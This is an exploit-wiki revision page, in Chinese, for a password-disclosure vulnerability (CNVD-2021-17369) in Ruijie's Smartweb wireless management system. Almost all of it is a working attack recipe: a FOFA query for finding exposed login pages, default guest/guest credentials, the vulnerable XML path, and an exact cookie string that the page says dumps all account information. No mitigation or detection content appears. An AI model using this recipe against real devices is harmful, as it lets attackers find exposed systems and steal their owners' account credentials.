Difference between revisions of "CNVD-2021-17369 銳捷Smartweb管理系統 密碼信息洩露漏洞"

From PwnWiki
(Marked this version for translation)
(修改错别字)
 
Line 1: Line 1:
 
<languages  />
 
<languages  />
 
 
==FOFA==
 
==FOFA==
 
<pre>
 
<pre>
 
title="无线smartWeb--登录页面"
 
title="无线smartWeb--登录页面"
 
</pre>
 
</pre>
 
 
<translate>
 
<translate>
 
==默認guest密碼== <!--T:1-->
 
==默認guest密碼== <!--T:1-->
 
</translate>
 
</translate>
 
 
<pre>
 
<pre>
 
guest/guest
 
guest/guest
Line 18: Line 15:
 
==漏洞位置== <!--T:2-->
 
==漏洞位置== <!--T:2-->
 
</translate>
 
</translate>
 
 
<pre>
 
<pre>
 
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
 
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Line 27: Line 23:
 
==漏洞利用== <!--T:3-->
 
==漏洞利用== <!--T:3-->
 
</translate>
 
</translate>
 
 
<translate>
 
<translate>
 
<!--T:4-->
 
<!--T:4-->
Cookice添加以下內容
+
Cookie添加以下內容
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 15:07, 12 July 2021

Other languages:

FOFA

title="无线smartWeb--登录页面"

默認guest密碼

guest/guest


漏洞位置

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml


漏洞利用

Cookie添加以下內容

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest


可以獲取所有賬戶信息